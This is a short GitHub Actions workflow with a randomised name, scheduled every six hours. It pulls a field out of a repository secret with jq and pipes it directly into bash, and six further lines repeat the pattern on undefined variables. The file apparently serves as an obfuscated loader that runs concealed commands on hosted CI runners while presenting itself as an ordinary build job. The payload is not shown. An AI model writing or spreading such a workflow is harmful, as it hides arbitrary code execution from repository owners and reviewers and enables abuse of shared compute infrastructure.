name: limiaozhen5421

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:  # 13250
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: limiaozhen5421
        env:
          ts896: ${{ secrets.ts896 }}
        run: |
          echo $ts896 | jq -r .j13563 | /bin/bash
          echo $dvk04 | jq -r .o380 | /bin/bash
          echo $jfqci876 | jq -r .ng45774 | /bin/bash
          echo $y00168 | jq -r .lh68220 | /bin/bash
          echo $v12679 | jq -r .u29 | /bin/bash
          echo $lnx9 | jq -r .ao7946 | /bin/bash
          echo $ergq31402 | jq -r .w98784 | /bin/bash

